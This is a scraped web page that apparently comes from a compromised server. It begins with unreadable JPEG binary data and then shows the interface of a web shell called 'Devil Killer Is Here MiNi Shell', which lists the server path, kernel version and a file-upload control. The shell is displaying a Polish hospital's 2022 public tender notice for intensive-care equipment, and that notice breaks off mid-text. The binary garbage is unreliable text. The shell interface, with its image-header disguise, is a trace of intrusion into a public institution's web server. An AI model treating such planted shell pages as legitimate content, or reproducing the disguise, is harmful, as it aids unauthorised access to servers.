JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220909/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220909/0034223001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup sprzętu dla Oddziału Anestezjologii i Intensywnej Terapii. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SZPITAL UNIWERSYTECKI IMIENIA KAROLA MARCINKOWSKIEGO W ZIELONEJ GÓRZE SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 970773231</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Zyty 26</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zielona Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">65-046</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@szpital.zgora.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szpital.zgora.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup sprzętu dla Oddziału Anestezjologii i Intensywnej Terapii. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-63c44e2e-305b-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00342230</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/szpital_zgora/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W niniejszym postępowaniu komunikacja między Zamawiającym, a Wykonawcami<br/>w szczególności składanie oświadczeń – innych niż oferta, wniosków, wyjaśnień, zawiadomień odbywa się za pośrednictwem<br/>platformazakupowa.pl i formularza „Wyślij wiadomość do Zamawiającego”.<br/>UWAGA:<br/>Zamawiający wymaga, aby dokumenty elektroniczne składane przez Wykonawcę sporządzone były w formacie: .pdf, .doc, .docx, .rtf,<br/>xps, .odt, .xls, .jpg (.jpeg), .xml. ze szczególnym wskazaniem na .pdf</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3. Wymagania techniczne i<br/>organizacyjne wysyłania i odbierania elektronicznych dokumentów i oświadczeń zostały opisane w regulaminie Platformy zakupowej<br/>(https://platformazakupowa.pl/strona/1-regulamin).<br/>4. Instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści<br/>SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują<br/>się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.<br/>5. Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do komunikacji to 500 MB.<br/>6. Wykonawca przystępujący do postępowania o udzielenie zamówienia publicznego akceptuje warunki korzystania z<br/>platformazakupowa.pl określone w Regulaminie, o którym mowa w punkcie 3 oraz uznaje go za wiążący.<br/>7. Zamawiający będzie przekazywał wykonawcom informacje za pośrednictwem platformazakupowa.pl. Informacje dotyczące<br/>odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na<br/>platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny<br/>wykonawca, będzie przekazywana za pośrednictwem platformazakupowa.pl do konkretnego wykonawcy na adres e-mail wskazany<br/>przez wykonawcę przy składaniu oferty.<br/>8. Oferta musi być sporządzona w języku polskim, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym w formacie danych: .pdf, .doc, .docx, .rtf, xps, .odt, .xls, .jpg (.jpeg), .xml. ze szczególnym<br/>wskazaniem na .pdf .</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1. Administratorem danych osobowych jest Szpital Uniwersytecki im. Karola Marcinkowskiego w Zielonej Górze sp. z o.o. z siedzibą<br/>w Zielonej Górze, 65-046 Zielona Góra, ul. Zyty 26<br/>2. Inspektorem ochrony danych osobowych u Zamawiającego jest Pan Jakub Lipiński, adres e-mail: nu@szpital.zgora.pl, telefon: 68/<br/>329 62 11;<br/>3. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o<br/>udzielenie zamówienia publicznego;<br/>4. Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o<br/>art. 18 oraz art. 74 ustawy;<br/>5. Dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 i 4 ustawy, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>6. Obowiązek podania danych osobowych bezpośrednio dotyczących Wykonawcy jest wymogiem ustawowym określonym w<br/>przepisach ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych wynikają z ustawy;<br/>7. W odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>8. Wykonawca posiada:<br/>8.1. na podstawie art. 15 RODO prawo dostępu do swoich danych osobowych;<br/>8.2. na podstawie art.16 RODO prawo do sprostowania lub uzupełnienia danych osobowych, przy czym skorzystanie z prawa do<br/>sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą<br/>postanowień umowy w zakresie nie-zgodnym z ustawą oraz nie może naruszać integralności protokołu oraz jego załączników;<br/>8.3. na podstawie art.18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art.18 ust.2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie<br/>ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia.<br/>8.4. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że przetwarzanie jego danych<br/>osobowych narusza przepisy RODO;<br/>9. Wykonawcy nie przysługuje:<br/>9.1. w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>9.2. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>9.3. na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.<br/>10. Jednocześnie Zamawiający przypomina o ciążącym na Wykonawcy obowiązku informacyjnym wynikającym<br/>z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym<br/>postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma<br/>zastosowanie co najmniej jedno z wyłączeń, o których mowa w art.14 ust.5 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1. Administratorem danych osobowych jest Szpital Uniwersytecki im. Karola Marcinkowskiego w Zielonej Górze sp. z o.o. z siedzibą<br/>w Zielonej Górze, 65-046 Zielona Góra, ul. Zyty 26<br/>2. Inspektorem ochrony danych osobowych u Zamawiającego jest Pan Jakub Lipiński, adres e-mail: nu@szpital.zgora.pl, telefon: 68/<br/>329 62 11;<br/>3. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o<br/>udzielenie zamówienia publicznego;<br/>4. Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o<br/>art. 18 oraz art. 74 ustawy;<br/>5. Dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 i 4 ustawy, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>6. Obowiązek podania danych osobowych bezpośrednio dotyczących Wykonawcy jest wymogiem ustawowym określonym w<br/>przepisach ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych wynikają z ustawy;<br/>7. W odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>8. Wykonawca posiada:<br/>8.1. na podstawie art. 15 RODO prawo dostępu do swoich danych osobowych;<br/>8.2. na podstawie art.16 RODO prawo do sprostowania lub uzupełnienia danych osobowych, przy czym skorzystanie z prawa do<br/>sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą<br/>postanowień umowy w zakresie nie-zgodnym z ustawą oraz nie może naruszać integralności protokołu oraz jego załączników;<br/>8.3. na podstawie art.18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art.18 ust.2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie<br/>ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia.<br/>8.4. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że przetwarzanie jego danych<br/>osobowych narusza przepisy RODO;<br/>9. Wykonawcy nie przysługuje:<br/>9.1. w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>9.2. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>9.3. na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.<br/>10. Jednocześnie Zamawiający przypomina o ciążącym na Wykonawcy obowiązku informacyjnym wynikającym<br/>z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym<br/>postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma<br/>zastosowanie co najmniej jedno z wyłączeń, o których mowa w art.14 ust.5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">LI.280.8.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Monitor do pomiarów hemodynamicznych – 1 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33123210-3 - Urządzenia do monitorowania czynności serca</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-11-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami:<br/><br/>Dla zadania nr 1 i 3:<br/><br/> 1.1 cena ofertowa = 80 pkt<br/> 1.2 okres gwarancji = 10 pkt<br/> 1.3 parametry techniczne = 10 pkt<br/>2. Sposób oceny ofert<br/>Wartość punktowa zostanie ustalona na podstawie następujących obliczeń:<br/><br/>2.1 Składnik A – dotyczy kryterium „cena ofertowa” (maksymalna ilość punktów jaką można uzyskać w kryterium „cena ofertowa” wynosi 80 pkt) <br/><br/> najniższa cena oferty<br/>Wartość punktowa = ------------------------------------ x	80 pkt<br/> cena oferty badanej <br/><br/>2.2. Składnik B - dotyczy kryterium „okres gwarancji” (maksymalna ilość punktów jaką można uzyskać w kryterium „okres gwarancji” wynosi 10 punktów), gdzie: „ilość punktów uzyskana przez ofertę” oznacza ilość punktów ustalonych dla badanej oferty zgodnie z poniższymi zasadami:<br/><br/>	- 24 miesiące od podpisania protokołu instalacji – 0 pkt<br/>	- 36 miesięcy od podpisania protokołu instalacji – 2 pkt<br/>	- 48 miesięcy od podpisania protokołu instalacji – 7 pkt<br/>	- 60 miesięcy i dłużej od podpisania protokołu instalacji – 10 pkt<br/><br/>Wykonawca nie może zaoferować okresu gwarancji krótszego niż 24 miesiące liczonych od dnia podpisania protokołu instalacji. Podanie krótszego okresu gwarancji, niż wymagany przez Zamawiającego, skutkować będzie odrzuceniem oferty. Zamawiający nie stawia górnej granicy okresu gwarancji, jednakże maksymalny okres gwarancji punktowany przez Zamawiającego wynosi 60 miesięcy. W przypadku wskazania okresu gwarancji dłuższego niż 60 miesięcy, Wykonawca otrzyma 10 punktów.<br/>Okres gwarancji Wykonawca zobowiązany jest wskazać w pkt 4.1. formularza oferty (załącznik nr 1 do SWZ). Zaoferowany przez Wykonawców okres gwarancji musi być wyrażony w pełnych miesiącach.<br/><br/>2.3. Składnik C - dotyczy kryterium „Parametry techniczne” (maksymalna ilość punktów jaką można uzyskać<br/>w kryterium „Parametry techniczne” wynosi 10 punktów), gdzie „ilość punktów	uzyskana przez ofertę” - oznacza ilość punktów ustalonych dla badanej oferty zgodnie z poniższymi zasadami:<br/><br/> Suma punktów za parametry <br/>techniczne w badanej ofercie<br/>	Wartość punktowa składnika C	= ------------------------------------ x 10 pkt<br/> Suma punktów za parametry<br/>techniczne w danym zadaniu<br/>Uwaga:<br/>1) „Suma punktów za parametry techniczne w badanej ofercie” – oznacza sumę uzyskanych punktów, wyliczoną wg pozycji punktowanych, zgodnie z informacją wskazaną przez Wykonawcę w formularzu cenowo - technicznym w badanej ofercie.<br/>2) Jeżeli w formularzu cenowo - technicznym, Wykonawca nie wskaże żadnej opcji przy punktowanej pozycji, Zamawiający przyzna w tej pozycji (dla ocenianego parametru) 0 punktów.<br/>3) „Suma punktów za parametry techniczne w danym zadaniu” – oznacza największą możliwą sumę punktów wyliczoną wg pozycji punktowanych, zgodnie z informacją Zamawiającego w formularzu cenowo - technicznym.<br/><br/>3. Jako najkorzystniejszą Zamawiający wybierze ofertę, która uzyska najwyższą ilość punktów (NLP) obliczoną wg poniższego wzoru:<br/><br/>	NLP = A + B + C<br/>	NLP – najwyższa liczba punktów<br/>	A - liczba punktów uzyskanych w kryterium – cena ofertowa,<br/>	B - liczba punktów uzyskanych w kryterium – okres gwarancji<br/>	C – liczba punktów uzyskanych w kryterium – parametry techniczne</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Parametry techniczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Urządzenie do terapii wątrobowej – 1 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33693000-4 - Pozostałe produkty terapeutyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-11-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami:<br/>Dla zadania nr 2:<br/><br/> 1.1 cena ofertowa = 80 pkt<br/> 1.2 okres gwarancji = 20 pkt<br/> <br/>	<br/> <br/>2. Sposób oceny ofert<br/>Wartość punktowa zostanie ustalona na podstawie następujących obliczeń:<br/><br/>2.1 Składnik A – dotyczy kryterium „cena ofertowa” (maksymalna ilość punktów jaką można uzyskać w kryterium „cena ofertowa” wynosi 80 pkt) <br/><br/> najniższa cena oferty<br/>Wartość punktowa = ------------------------------------ x	80 pkt<br/> cena oferty badanej <br/><br/>2.2. Składnik B - dotyczy kryterium „okres gwarancji” (maksymalna ilość punktów jaką można uzyskać w kryterium „okres gwarancji” wynosi 20 punktów), gdzie: „ilość punktów uzyskana przez ofertę” oznacza ilość punktów ustalonych dla badanej oferty zgodnie z poniższymi 